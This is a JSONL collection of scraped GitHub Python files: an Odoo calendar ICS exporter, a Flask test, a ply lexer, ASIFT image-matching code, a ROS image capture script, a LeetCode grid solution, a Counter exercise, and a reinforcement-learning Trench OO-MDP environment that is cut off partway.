{"seq_id":"3882618589","text":"import base64\nimport cStringIO\nimport contextlib\nimport csv\nimport datetime\nimport pytz\n\nfrom odoo import models, fields, api\n\n\nclass DownloadContact(models.Model):\n    _inherit = 'calendar.event'\n    file_name = fields.Char()\n    data = fields.Binary(string=\"File\", readonly=True)\n\n    @api.multi\n    def download(self):\n        if self.id:\n            with contextlib.closing(cStringIO.StringIO()) as buf:\n                tz = pytz.timezone(self.env.user.tz) if self.env.user.tz else pytz.utc\n                if self.start_datetime:\n                    start_datetime = self._convert_datetime_format(self.start_datetime)\n                else:\n                    start_datetime=''\n                if self.start_date:\n                    start_date = self._convert_date_format(self.start_date)\n                else:\n                    start_date=''\n                if self.stop_datetime:\n                    stop_datetime = self._convert_datetime_format(self.stop_datetime)\n                else:\n                    stop_datetime=''\n                if self.stop_date:\n                    stop_date = self._convert_date_format(self.stop_date)\n                else:\n                    stop_date = ''\n                if self.create_date:\n                    create_date = self._convert_datetime_format(self.create_date)\n                else:\n                    # _convert_date_format expects a 'YYYY-MM-DD' string, not a datetime object\n                    create_date = self._convert_date_format(datetime.datetime.now().strftime('%Y-%m-%d'))\n                if self.start:\n                    start = self._convert_datetime_format(self.start)\n                else:\n                    start =''\n                if self.privacy =='public':\n                    method = 'PUBLISH'\n                elif self.privacy =='private':\n                    method = 'REQUEST'\n                elif self.privacy =='confidential':\n                    method ='REQUEST'\n\n                writer = csv.writer(buf, delimiter=\":\", quotechar='\"')\n                writer.writerow((\"BEGIN\", \"VCALENDAR\"))\n                writer.writerow((\"VERSION\", \"2.0\"))\n                writer.writerow((\"PRODID\", '-//magestore.vn//Calendar 1.0//EN'))\n                writer.writerow((\"CALSCALE\", \"GREGORIAN\"))\n\n                writer.writerow((\"BEGIN\", \"VEVENT\" ))\n                writer.writerow((\"X-WR-CALNAME\", self.user_id.name.encode('utf8') if self.user_id.name else ''))\n                writer.writerow((\"X-WR-TIMEZONE\", tz if tz else ''))\n                writer.writerow((\"METHOD\", method))\n                
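# (added note) iCalendar basic format is YYYYMMDDTHHMMSS; the _convert_*_format\n                # helpers at the bottom of this class strip '-', ':' and the separator to produce it\n                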
writer.writerow((\"DTSTART\", start_datetime if start_datetime else start_date))\n writer.writerow((\"DTEND\", stop_datetime if stop_datetime else stop_date ))\n writer.writerow((\"DTSTAMP\", start))\n writer.writerow((\"UID\", self.user_id.id if self.user_id.id else ''))\n writer.writerow((\"CREATED\", create_date))\n writer.writerow((\"DESCRIPTION\", self.description.encode('utf-8') if self.description else ''))\n writer.writerow((\"LAST-MODIFIED\", create_date))\n writer.writerow((\"LOCATION\", self.location.encode('utf-8') if self.location else ''))\n writer.writerow((\"SEQUENCE\", 0))\n writer.writerow((\"STATUS\", self.state.upper()))\n writer.writerow((\"SUMMARY\", self.name.encode('utf-8').upper() ))\n\n writer.writerow((\"TRANSP\", 'OPAQUE' ))\n writer.writerow((\"END\", 'VEVENT' ))\n writer.writerow((\"END\", 'VCALENDAR' ))\n\n out = base64.encodestring(buf.getvalue())\n self.write({\n 'data': out,\n 'file_name': self.name + '.ics'\n })\n\n compose_form = self.env.ref('calendar_exp.wizard_export_calendar')\n return {\n 'type': 'ir.actions.act_window',\n 'res_model': 'calendar.event',\n 'view_mode': 'form',\n 'view_type': 'form',\n 'res_id': self.id,\n 'views': [(compose_form.id, 'form')],\n 'view_id': compose_form.id,\n 'target': 'new',\n }\n\n def _convert_date_format(self, s):\n s = s.replace('-', '')\n s += \"T000000\"\n return s\n\n def _convert_datetime_format(self,s):\n s = s.replace('-', '')\n s = s.replace(':', '')\n s = s.replace(' ', 'T')\n return s\n\n","repo_name":"tienthanhtk115/My-odoo-module","sub_path":"calendar_exp/wizard/export_calendar.py","file_name":"export_calendar.py","file_ext":"py","file_size_in_byte":4315,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"71636255257","text":"# project/server/tests/test_main.py\n\n\nimport unittest\n\nfrom base import BaseTestCase\n\n\nclass TestMainBlueprint(BaseTestCase):\n\n def test_index(self):\n # Ensure Flask is setup.\n response = self.client.get('/', follow_redirects=True)\n self.assertEqual(response.status_code, 200)\n self.assertIn(b'Historical Rates', response.data)\n\n def test_404(self):\n # Ensure 404 error is handled.\n response = self.client.get('/404')\n self.assert404(response)\n self.assertTemplateUsed('errors/404.html')\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"pybites/challenges","sub_path":"28/mjhea0/project/tests/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":683,"dataset":"github-code","pt":"68"} +{"seq_id":"71431304218","text":"## Imports\n\n#Importing Lex and Yacc from the ply module\n\nimport ply.lex as lex\nimport sajilo.exceptions\n\n\n# Tokens \n''' \nToken are defined here to make it easier to reuse the values later\nReserved keywords need to be done separately\n'''\n\nkeywords = {\n # Reserved keywords, Always required\n ## Needs refactoring. 
Never do this way.\n 'yedi': 'IF',\n 'navaye': 'ELSE',\n\n 'loop': 'FOR',\n 'lai': 'IN',\n 'jaba': 'WHILE',\n 'anta': 'EXIT',\n\n 'vidhi': 'FUNCTION',\n 'pathau': 'RETURN',\n\n 'lekha': 'PRINT',\n\n 'ra': 'AND',\n 'athawa': 'OR',\n 'haina': 'NOT',\n}\n\ntokens = [\n 'KEYWORD',\n 'STMT_END',\n 'EQUALS',\n 'IDENTIFIER',\n 'NUM_INT',\n 'NUM_FLOAT',\n 'LPAREN',\n 'RPAREN',\n 'LBRACK',\n 'RBRACK',\n 'COMMA',\n 'STRING',\n 'NEWLINE',\n 'LSQBRACK',\n 'RSQBRACK',\n 'COLON',\n 'QUESTION_MARK',\n\n 'PLUS',\n 'EXP',\n 'MINUS',\n 'MUL',\n 'DIV',\n 'MOD',\n\n 'LSHIFT',\n 'RSHIFT',\n 'BIT_AND',\n 'BIT_OR',\n 'BIT_XOR',\n 'BIT_NEG',\n\n 'DOUBLE_PLUS',\n 'DOUBLE_MINUS',\n\n 'PLUS_EQ',\n 'MINUS_EQ',\n 'MUL_EQ',\n 'DIV_EQ',\n 'MOD_EQ',\n 'EXP_EQ',\n\n\n 'TRUE',\n 'FALSE',\n\n 'EQ',\n 'NEQ',\n 'GT',\n 'GTE',\n 'LT',\n 'LTE',\n\n 'ARROW_LTR',\n 'ARROW_RTL'\n] + list(keywords.values())\n\nt_COMMA = ','\nt_PLUS = r'\\+'\nt_EXP = r'\\*\\*'\nt_MINUS = '-'\nt_MUL = r'\\*'\nt_DIV = r'/'\nt_MOD = '%'\nt_STMT_END = ';'\nt_QUESTION_MARK = r'\\?'\nt_EQUALS = '='\nt_ignore_WS = r'\\s+'\nt_COLON = ':'\nt_LPAREN = r'\\('\nt_RPAREN = r'\\)'\nt_LBRACK = '{'\nt_RBRACK = '}'\nt_LSQBRACK = r'\\['\nt_RSQBRACK = r'\\]'\nt_EQ = '=='\nt_NEQ = '!='\nt_GT = '>'\nt_GTE = '>='\nt_LT = '<'\nt_LTE = '<='\nt_ARROW_LTR = '->'\nt_ARROW_RTL = '<-'\nt_ignore_COMMENTS = r'//.+'\nt_PLUS_EQ = r'\\+='\nt_MINUS_EQ = r'-='\nt_MUL_EQ = r'\\*='\nt_DIV_EQ = r'/='\nt_MOD_EQ = '%='\nt_EXP_EQ = '\\*\\*='\n\nt_RSHIFT = '>>'\nt_LSHIFT = '<<'\nt_BIT_AND = r'\\&'\nt_BIT_OR = r'\\|'\nt_BIT_XOR = r'\\^'\nt_BIT_NEG = r'~'\n\nt_DOUBLE_PLUS = r'\\+\\+'\nt_DOUBLE_MINUS = '--'\n\n\ndef t_NEWLINE(t):\n r'\\n'\n t.lexer.lineno += 1\n t.lexer.linepos = 0\n pass\n\n\ndef t_TRUE(t):\n 'true'\n t.value = True\n return t\n\n\ndef t_FALSE(t):\n 'false'\n t.value = False\n return t\n\n\ndef t_IDENTIFIER(t):\n r'[\\$_a-zA-Z]\\w*'\n\n t.type = keywords.get(t.value, t.type)\n\n return t\n\n\ndef t_NUM_FLOAT(t):\n r'\\d*\\.\\d+'\n t.value = float(t.value)\n return t\n\n\ndef t_NUM_INT(t):\n r'\\d+'\n t.value = int(t.value)\n return t\n\n\ndef t_STRING(t):\n r'\"(?:\\\\\"|.)*?\"'\n t.value = bytes(t.value.lstrip('\"').rstrip('\"'), \"utf-8\").decode(\"unicode_escape\")\n return t\n\n\ndef t_error(t):\n raise sajilo.exceptions.UnexpectedCharacter(\"Unexpected character '%s' at line %d\" % (t.value[0], t.lineno))\n\n#Build the lexer\nlexer = lex.lex()","repo_name":"theanilbhattarai/sajilo-alpha-final","sub_path":"sajilo/lexer.py","file_name":"lexer.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"41519616523","text":"from common import *\nimport heapq\n\n\nclass ImagePairAsiftMatches:\n def __init__(self):\n self.asift_feature_matchings = []\n\n def add_match(self, kpts1, kpts2, matches):\n self.asift_feature_matchings.append((kpts1, kpts2, matches))\n\n def getAll(self):\n kp1_all = []\n kp2_all = []\n matches_all = []\n kp1_next = 0\n kp2_next = 0\n for i in range(0, len(self.asift_feature_matchings)):\n for match in self.asift_feature_matchings[i][2]:\n kp1_all.append(self.asift_feature_matchings[i][0][match.queryIdx])\n match.queryIdx = kp1_next\n kp1_next += 1\n kp2_all.append(self.asift_feature_matchings[i][1][match.trainIdx])\n match.trainIdx = kp2_next\n kp2_next += 1\n matches_all.append(match)\n return kp1_all, kp2_all, matches_all\n\n\nclass SingleViewpointAsiftFeatures:\n def __init__(self, tilt, phi, sift_points, sift_desc):\n self.tilt = tilt\n self.phi = phi\n 
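# (added note) this constructor is shadowed by the second __init__ below;\n        # Python keeps only the last definition, so only the (tilt, phi) form is live\n        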
self.sift_points = sift_points\n self.sift_desc = sift_desc\n\n def __init__(self, tilt, phi):\n self.tilt = tilt\n self.phi = phi\n self.sift_points = []\n self.sift_desc = []\n\n def normalize(self, rotmat, tiltmat):\n constant = np.array([[0, 0, 1]])\n affinemat = np.matmul(np.concatenate([tiltmat, constant]), np.concatenate([rotmat, constant]))[:-1]\n inversemat = cv.invertAffineTransform(affinemat)\n self._inverse_tilt_rot(inversemat)\n\n def _inverse_tilt_rot(self, inversewmat):\n # 2 by 3 mat\n change = inversewmat[:, :-1]\n translation = inversewmat[:, -1].reshape((2, 1))\n for point in self.sift_points:\n coord = np.array(point.pt).reshape((2, 1))\n coord = np.matmul(change, coord)\n coord += translation\n coord.astype(np.int32)\n point.pt = (coord[0, 0], coord[1, 0])\n\n\ndef affine_detect_compute(img, phi, tilt, corners=None):\n # return SingleViewpointAsiftFeatures insstance\n detector = cv.xfeatures2d_SIFT.create()\n keypoint = SingleViewpointAsiftFeatures(tilt, phi)\n rot_img, rot_mat, rot_corners = rotation_phi(img, phi, corners)\n tilt_img, tilt_mat, tilt_corners = tilt_image(rot_img, tilt, rot_corners)\n keypoint.sift_points, keypoint.sift_desc = \\\n detector.detectAndCompute(tilt_img, mask_of(tilt_img.shape[0], tilt_img.shape[1], tilt_corners))\n keypoint.normalize(rot_mat, tilt_mat)\n return keypoint\n\n\ndef detect_compute(img, content_corners=None, sigma_t=2 ** 0.5, n=5, b=72, draw=None):\n # asift keypoints\n if content_corners is None:\n content_corners = default_corners(img)\n detector = cv.xfeatures2d_SIFT.create()\n features = []\n first = SingleViewpointAsiftFeatures(1, 0)\n first.sift_points, first.sift_desc = detector. \\\n detectAndCompute(img, mask_of(img.shape[0], img.shape[1], content_corners))\n features.append(first)\n for i in range(1, n + 1):\n tilt = sigma_t ** i\n k = 0\n phi = k * b / tilt\n while phi < 180:\n keypoint = affine_detect_compute(img, phi, tilt, content_corners)\n features.append(keypoint)\n # update phi\n k += 1\n phi = k * b / tilt\n if draw is not None:\n all_keypoints = []\n for asift_point in features:\n all_keypoints += asift_point.sift_points\n empty = np.empty((img.shape[0], img.shape[1], 3), dtype=np.uint8)\n cv.drawKeypoints(img, all_keypoints, empty)\n cv.imwrite(draw, empty)\n print(\"Detect complete !\")\n return features\n\n\ndef two_resolution_match(img1, img2, corners1=None, corners2=None, draw=None, scale=1 / 3, n_affine=5,\n match_result=None):\n ratio_thresh = 0.7\n if corners1 is None:\n corners1 = default_corners(img1)\n if corners2 is None:\n corners2 = default_corners(img2)\n corners1_ds = np.int32(corners1 * scale)\n corners2_ds = np.int32(corners2 * scale)\n img1_ds = cv.resize(img1, (0, 0), fx=scale, fy=scale)\n img2_ds = cv.resize(img2, (0, 0), fx=scale, fy=scale)\n img1_ds_features = detect_compute(img1_ds, corners1_ds)\n img2_ds_features = detect_compute(img2_ds, corners2_ds)\n matcher = cv.DescriptorMatcher_create(cv.DescriptorMatcher_FLANNBASED)\n affine_pairs = []\n for ds_feature1 in img1_ds_features:\n for ds_feature2 in img2_ds_features:\n raw_matches = matcher.knnMatch(ds_feature1.sift_desc, ds_feature2.sift_desc, 2)\n good_matches = []\n for m, n in raw_matches:\n if m.distance < ratio_thresh * n.distance:\n good_matches.append(m)\n affine_pairs.append({'length': len(good_matches), 'affine1': (ds_feature1.phi, ds_feature1.tilt),\n 'affine2': (ds_feature2.phi, ds_feature2.tilt)})\n good_affines = heapq.nlargest(n_affine, affine_pairs, key=lambda item: item['length'])\n all_matche_tupels = 
ImagePairAsiftMatches()\n print('Low resolution complete !')\n for affine in good_affines:\n points1, points2, matches = affine_feature_match(img1, img2, affine['affine1'], affine['affine2'], corners1,\n corners2)\n all_matche_tupels.add_match(points1, points2, matches)\n img1_left_points, img2_left_points, all_matches = all_matche_tupels.getAll()\n match_filtering(img1_left_points, img2_left_points, all_matches)\n if draw is not None:\n draw_match(img1, img1_left_points, img2, img2_left_points, all_matches, draw)\n if match_result is not None:\n match_result.append((img1_left_points, img2_left_points, all_matches))\n corresponding1 = []\n corresponding2 = []\n for match in all_matches:\n corresponding1.append(img1_left_points[match.queryIdx].pt)\n corresponding2.append(img2_left_points[match.trainIdx].pt)\n corresponding1 = np.float32(corresponding1).reshape(-1, 1, 2)\n corresponding2 = np.float32(corresponding2).reshape(-1, 1, 2)\n return corresponding1, corresponding2\n\n\ndef affine_feature_match(img1, img2, affine1, affine2, corners1=None, corners2=None):\n ratio_thresh = 0.7\n if corners1 is None:\n corners1 = default_corners(img1)\n if corners2 is None:\n corners2 = default_corners(img2)\n img1feature = affine_detect_compute(img1, affine1[0], affine1[1], corners1)\n img2feature = affine_detect_compute(img2, affine2[0], affine2[1], corners2)\n matcher = cv.DescriptorMatcher_create(cv.DescriptorMatcher_FLANNBASED)\n raw_matches = matcher.knnMatch(img1feature.sift_desc, img2feature.sift_desc, 2)\n good_matches = []\n for m, n in raw_matches:\n if m.distance < ratio_thresh * n.distance:\n good_matches.append(m)\n return img1feature.sift_points, img2feature.sift_points, good_matches\n\n\ndef feature_match(img1, img2, corners1=None, corners2=None, img1_features=None, img2_features=None, draw=None):\n ratio_thresh = 0.7\n if img1_features is None:\n img1_features = detect_compute(img1, corners1)\n if img2_features is None:\n img2_features = detect_compute(img2, corners2)\n matcher = cv.DescriptorMatcher_create(cv.DescriptorMatcher_FLANNBASED)\n all_matche_tupels = ImagePairAsiftMatches()\n turn = 0\n for img1feature in img1_features:\n for img2feature in img2_features:\n raw_matches = matcher.knnMatch(img1feature.sift_desc, img2feature.sift_desc, 2)\n turn += 1\n if turn % 20 == 0:\n print('asift match: ' + str(turn))\n good_matches = []\n # ratio test\n for m, n in raw_matches:\n if m.distance < ratio_thresh * n.distance:\n good_matches.append(m)\n all_matche_tupels.add_match(img1feature.sift_points, img2feature.sift_points, good_matches)\n img1_left_points, img2_left_points, all_matches = all_matche_tupels.getAll()\n match_filtering(img1_left_points, img2_left_points, all_matches)\n if draw is not None:\n draw_match(img1, img1_left_points, img2, img2_left_points, all_matches, draw)\n corresponding1 = []\n corresponding2 = []\n for match in all_matches:\n corresponding1.append(img1_left_points[match.queryIdx])\n corresponding2.append(img2_left_points[match.trainIdx])\n return corresponding1, corresponding2\n\n\ndef match_filtering(kpts1, kpts2, matches):\n print(\"left matches: \" + str(len(matches)))\n distance = lambda pt1, pt2: abs(pt1.pt[0] - pt2.pt[0]) + abs(pt1.pt[1] - pt2.pt[1])\n isMultiple = lambda pt1, pt2: pt1.pt[0] - pt2.pt[0] >= 2 or pt1.pt[1] - pt2.pt[1] >= 2\n # remove identical matches\n idx1 = 0\n while idx1 < len(matches):\n if idx1 % 100 == 0:\n print('identical filtering: ' + str(idx1))\n remove_idx = []\n end1point1 = kpts1[matches[idx1].queryIdx]\n end2point1 = 
kpts2[matches[idx1].trainIdx]\n for idx2 in range(idx1 + 1, len(matches)):\n end1point2 = kpts1[matches[idx2].queryIdx]\n end2point2 = kpts2[matches[idx2].trainIdx]\n if distance(end1point1, end1point2) < 2 and distance(end2point1, end2point2) < 2:\n remove_idx.append(idx2)\n pop_num = 0\n for idx in remove_idx:\n matches.pop(idx - pop_num)\n pop_num += 1\n idx1 += 1\n print(\"left matches: \" + str(len(matches)))\n # remove one to multiple matches\n idx1 = 0\n while idx1 < len(matches):\n if idx1 % 100 == 0:\n print('multiple filtering: ' + str(idx1))\n remove_first = False\n remove_idx = []\n end1point1 = kpts1[matches[idx1].queryIdx]\n end2point1 = kpts2[matches[idx1].trainIdx]\n for idx2 in range(idx1 + 1, len(matches)):\n end1point2 = kpts1[matches[idx2].queryIdx]\n end2point2 = kpts2[matches[idx2].trainIdx]\n if distance(end1point1, end1point2) < 2 and isMultiple(end2point1, end2point2):\n remove_first = True\n remove_idx.append(idx2)\n if remove_first:\n matches.pop(idx1)\n pop_num = 1\n else:\n idx1 += 1\n pop_num = 0\n for idx in remove_idx:\n matches.pop(idx - pop_num)\n pop_num += 1\n print(\"left matches: \" + str(len(matches)))\n\n\nif __name__ == '__main__':\n import os\n\n # test pair\n location = os.path.join(data_dir, 'Image', 'Cross-19-2019-11.png')\n location = cv.imread(location)\n map_img = os.path.join(data_dir, 'Image', 'BUAA-19-2019-11.png')\n map_img = cv.imread(map_img)\n augmented, corners = data_augment(location, expr_base)\n two_resolution_match(augmented, map_img, corners1=corners, draw=os.path.join(expr_base, 'fastmatch.png'))\n feature_match(augmented, map_img, corners1=corners, draw=os.path.join(expr_base, 'match.png'))\n","repo_name":"PatrickZad/AerialVisualGeoloc","sub_path":"asiftmatch.py","file_name":"asiftmatch.py","file_ext":"py","file_size_in_byte":10954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"28726024948","text":"#!/usr/bin/python3\n\nimport numpy as np\nimport cv2\nimport rospy\nfrom sensor_msgs.msg import Image\n\nimg=np.array([[0,0,0]], np.uint8)\n\nrospy.init_node('training', anonymous=True)\n\nc=0\nnumimg = 0\n\ndef perception(data):\n global img, c, numimg\n c+=1\n if c==20:\n numimg +=1\n img = np.array(list(data.data), np.uint8)\n img = np.resize(img, (data.height, data.width, 3))\n img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)\n cv2.imwrite(str(numimg)+\".jpg\", img)\n print(\"images/\"+str(numimg)+\".jpg\")\n c=0\n\ncommandListener = rospy.Subscriber(\"/camera/color/image_raw\", Image, perception)\n\nprint(\"Start training.py\")\nrospy.spin()","repo_name":"maximebohrer/larm_moutarde","sub_path":"grp-moutarde/scripts/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"30995241697","text":"class Solution:\n def orangesRotting(self, grid: List[List[int]]) -> int:\n m=len(grid)\n n=len(grid[0])\n queue=collections.deque()\n drow=[-1, 0, 1, 0]\n dcol=[0, 1, 0, -1]\n days=0\n cnt=0\n tot=0\n\n for i in range(0, m):\n for j in range(0, n):\n if grid[i][j]==2:\n queue.append((i, j))\n if grid[i][j]!=0:\n tot+=1\n \n while queue:\n size=len(queue)\n cnt+=size\n while size:\n tup=queue.popleft()\n for i in range(0, 4):\n nrow=drow[i]+tup[0]\n ncol=dcol[i]+tup[1]\n if self.valid(nrow, ncol, grid, m, n):\n grid[nrow][ncol]=2\n queue.append((nrow, ncol))\n size-=1\n\n if len(queue)!=0:\n days+=1\n if tot==cnt:\n return days\n return -1\n\n def 
valid(self, row, col, grid, m, n):\n        if row<0 or col<0 or row>=m or col>=n or grid[row][col]!=1:\n            return False\n        return True","repo_name":"sourabpramanik/Leetcode","sub_path":"problems/rotting_oranges/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"17278237617","text":"from collections import Counter\nparticipant = [\"leo\", \"kiki\", \"eden\"]\ncompletion = [\"eden\", \"kiki\"]\n\n\nparticipant = dict(Counter(participant))\ncompletion = dict(Counter(completion))\n\nfor key, value in participant.items():\n    try: \n        if value != completion[key]:\n            print(key)\n    except KeyError:\n        print(key) \n\n\n\ndict1 = Counter([1,1,1,1,2,2,2,3,3])\ndict2 = Counter([1,1,1,1])\n# subtract the Counters first, then wrap with dict()\nprint(dict(dict1 - dict2)) # {2: 3, 3: 2} ","repo_name":"selimssy/algorithm","sub_path":"Desktop/algorithm/p1/완주하지 못한 선수.py","file_name":"완주하지 못한 선수.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"34809879458","text":"import copy\nimport random\n\nfrom simple_rl.agents import QLearningAgent\nfrom simple_rl.agents import RandomAgent\nfrom simple_rl.mdp import OOMDP\nfrom simple_rl.mdp.oomdp.OOMDPObjectClass import OOMDPObject\nfrom simple_rl.planning import ValueIteration\nfrom simple_rl.run_experiments import run_agents_on_mdp\nfrom simple_rl.tasks.trench.TrenchOOMDPState import TrenchOOMDPState\n\n\nclass TrenchOOMDP(OOMDP):\n    ''' Class for a Trench OO-MDP '''\n\n    # Static constants.\n    ACTIONS = [\"forward\", \"rotate_right\", \"rotate_left\", \"pickup\", \"place\"]\n    ATTRIBUTES = [\"x\", \"y\", \"dx\", \"dy\", \"has_block\", \"dest_x\", \"dest_y\"]\n    CLASSES = [\"agent\", \"block\", \"lava\"]\n\n    def __init__(self, width, height, agent, blocks, lavas, gamma=0.99, slip_prob=0.0, name=\"trench\"):\n        self.height = height\n        self.width = width\n        self.name = name\n\n        agent_obj = OOMDPObject(attributes=agent, name=\"agent\")\n        block_objs = self._make_oomdp_objs_from_list_of_dict(blocks, \"block\")\n        lava_objs = self._make_oomdp_objs_from_list_of_dict(lavas, \"lava\")\n\n        init_state = self._create_state(agent_obj, block_objs, lava_objs)\n        OOMDP.__init__(self, TrenchOOMDP.ACTIONS, self._trench_transition_func, self._trench_reward_func, init_state=init_state, gamma=gamma)\n        self.slip_prob = slip_prob\n\n    def _create_state(self, agent_oo_obj, blocks, lavas):\n        '''\n        Args:\n            agent_oo_obj (OOMDPObjects)\n            blocks (list of OOMDPObject)\n            lavas (list of OOMDPObject)\n\n        Returns:\n            (OOMDP State)\n        '''\n\n        objects = {c : [] for c in TrenchOOMDP.CLASSES}\n\n        objects[\"agent\"].append(agent_oo_obj)\n\n        # Make blocks.\n        for b in blocks:\n            objects[\"block\"].append(b)\n\n        # Make lavas.\n        for l in lavas:\n            objects[\"lava\"].append(l)\n\n        return TrenchOOMDPState(objects)\n\n    def _trench_reward_func(self, state, action, next_state=None):\n        '''\n        Args:\n            state (State)\n            action (str)\n            next_state (State)\n\n        Returns\n            (float)\n        '''\n\n        if self._is_goal_state_action(state, action):\n            return 10.0\n        # the original branch indexed an undefined self.lava_locs via next_state attributes;\n        # reuse the lava check defined below instead\n        elif self._is_lava_state_action(state, action):\n            return -1.0\n        else:\n            return 0\n\n    def _is_goal_state_action(self, state, action):\n        if action == \"forward\":\n            agent = state.get_first_obj_of_class(\"agent\")\n\n            next_x = agent.get_attribute(\"x\") + agent.get_attribute(\"dx\")\n            next_y = agent.get_attribute(\"y\") + agent.get_attribute(\"dy\")\n            if next_x == 
agent.get_attribute(\"dest_x\") and next_y == agent.get_attribute(\"dest_y\"):\n return True\n else:\n return False\n return False\n\n def _is_lava_state_action(self, state, action):\n if action == \"forward\":\n agent = state.get_first_obj_of_class(\"agent\")\n\n next_x = agent.get_attribute(\"x\") + agent.get_attribute(\"dx\")\n next_y = agent.get_attribute(\"y\") + agent.get_attribute(\"dy\")\n for l in state.get_objects_of_class(\"lava\"):\n if next_x == l.get_attribute(\"x\") and next_y == l.get_attribute(\"y\"):\n return True\n return False\n\n def _is_goal_state(self, state):\n agent = state.get_first_obj_of_class(\"agent\")\n\n next_x = agent.get_attribute(\"x\")\n next_y = agent.get_attribute(\"y\")\n if next_x == agent.get_attribute(\"dest_x\") and next_y == agent.get_attribute(\"dest_y\"):\n return True\n else:\n return False\n\n def _is_lava_state(self, state):\n agent = state.get_first_obj_of_class(\"agent\")\n\n next_x = agent.get_attribute(\"x\")\n next_y = agent.get_attribute(\"y\")\n for l in state.get_objects_of_class(\"lava\"):\n if next_x == l.get_attribute(\"x\") and next_y == l.get_attribute(\"y\"):\n return True\n return False\n\n def _trench_transition_func(self, state, action):\n '''\n Args:\n state (State)\n action (str)\n\n Returns\n (State)\n '''\n if state.is_terminal():\n return state\n\n r = random.random()\n\n if self.slip_prob > r:\n # Flip dir.\n if action == \"forward\":\n action = random.choice([\"rotate_left\", \"rotate_right\", \"place\"])\n elif action == \"rotate_left\":\n action = random.choice([\"forward\", \"rotate_right\", \"place\"])\n elif action == \"rotate_right\":\n action = random.choice([\"forward\", \"rotate_left\", \"place\"])\n\n forward_state_in_bounds = self._forward_state_in_bounds(state)\n is_forward_loc_block = self._is_forward_loc_block(state)\n if action == \"forward\" and forward_state_in_bounds and not is_forward_loc_block:\n next_state = self.move_agent_forward(state)\n elif action == \"rotate_left\":\n next_state = self.rotate_agent_left(state)\n elif action == \"rotate_right\":\n next_state = self.rotate_agent_right(state)\n elif action == \"pickup\" and is_forward_loc_block:\n next_state = self.agent_pickup(state)\n elif action == \"place\" and state.get_first_obj_of_class(\"agent\").get_attribute(\"has_block\") and \\\n forward_state_in_bounds and not is_forward_loc_block:\n next_state = self.agent_place(state)\n else:\n next_state = state\n\n if self._is_terminal_state(next_state):\n next_state.set_terminal(True)\n\n # All OOMDP states must be updated.\n next_state.update()\n\n return next_state\n\n def _is_terminal_state(self, state):\n return self._is_goal_state(state) or self._is_lava_state(state)\n\n def _is_forward_loc_block(self, state):\n agent = state.get_first_obj_of_class(\"agent\")\n\n next_x = agent.get_attribute(\"x\") + agent.get_attribute(\"dx\")\n next_y = agent.get_attribute(\"y\") + agent.get_attribute(\"dy\")\n\n for b in state.get_objects_of_class(\"block\"):\n if next_x == b[\"x\"] and next_y == b[\"y\"]:\n return True\n return False\n\n def _forward_state_in_bounds(self, state):\n agent = state.get_first_obj_of_class(\"agent\")\n\n next_x = agent.get_attribute(\"x\") + agent.get_attribute(\"dx\")\n next_y = agent.get_attribute(\"y\") + agent.get_attribute(\"dy\")\n\n x_check = 1 <= next_x <= self.width\n y_check = 1 <= next_y <= self.height\n return x_check and y_check\n\n def move_agent_forward(self, state):\n next_state = copy.deepcopy(state)\n\n agent_att = 
next_state.get_first_obj_of_class(\"agent\").get_attributes()\n        agent_att[\"x\"] += agent_att[\"dx\"]\n        agent_att[\"y\"] += agent_att[\"dy\"]\n\n        return next_state\n\n    def rotate_agent_left(self, state):\n        next_state = copy.deepcopy(state)\n\n        agent_att = next_state.get_first_obj_of_class(\"agent\").get_attributes()\n        curr_dir = (agent_att[\"dx\"], agent_att[\"dy\"])\n\n        dir_updates = [(1, 0), (0, 1), (-1, 0), (0, -1)]\n        agent_att[\"dx\"], agent_att[\"dy\"] = dir_updates[(dir_updates.index(curr_dir) + 1) % len(dir_updates)]\n        return next_state\n\n    def rotate_agent_right(self, state):\n        next_state = copy.deepcopy(state)\n\n        agent_att = next_state.get_first_obj_of_class(\"agent\").get_attributes()\n        curr_dir = (agent_att[\"dx\"], agent_att[\"dy\"])\n\n        dir_updates = [(0, -1), (-1, 0), (0, 1), (1, 0)]\n        agent_att[\"dx\"], agent_att[\"dy\"] = dir_updates[(dir_updates.index(curr_dir) + 1) % len(dir_updates)]\n        return next_state\n\n    def agent_pickup(self, state):\n        next_state = copy.deepcopy(state)\n\n        agent = next_state.get_first_obj_of_class(\"agent\")\n        next_x = agent.get_attribute(\"x\") + agent.get_attribute(\"dx\")\n        next_y = agent.get_attribute(\"y\") + agent.get_attribute(\"dy\")\n\n        agent.set_attribute(\"has_block\", 1)\n        block_remove = 0\n        for b in next_state.get_objects_of_class(\"block\"):\n            if next_x == b[\"x\"] and next_y == b[\"y\"]:\n                break\n            block_remove += 1\n        next_state.get_objects_of_class(\"block\").pop(block_remove)\n        return next_state\n\n    def agent_place(self, state):\n        next_state = copy.deepcopy(state)\n\n        agent = next_state.get_first_obj_of_class(\"agent\")\n\n        agent.set_attribute(\"has_block\", 0)\n        next_x = agent.get_attribute(\"x\") + agent.get_attribute(\"dx\")\n        next_y = agent.get_attribute(\"y\") + agent.get_attribute(\"dy\")\n\n        if self._is_lava_state_action(next_state, \"forward\"):\n            lava_remove = 0\n            for l in next_state.get_objects_of_class(\"lava\"):\n                if next_x == l.get_attribute(\"x\") and next_y == l.get_attribute(\"y\"):\n                    break\n                lava_remove += 1\n\n            next_state.get_objects_of_class(\"lava\").pop(lava_remove)\n        else:\n            new_block = {\"x\": next_x, \"y\": next_y}\n            new_block_obj = self._make_oomdp_objs_from_list_of_dict([new_block], \"block\")\n            next_state.get_objects_of_class(\"block\").append(new_block_obj[0])\n\n        return next_state\n\n    def __str__(self):\n        prefix = 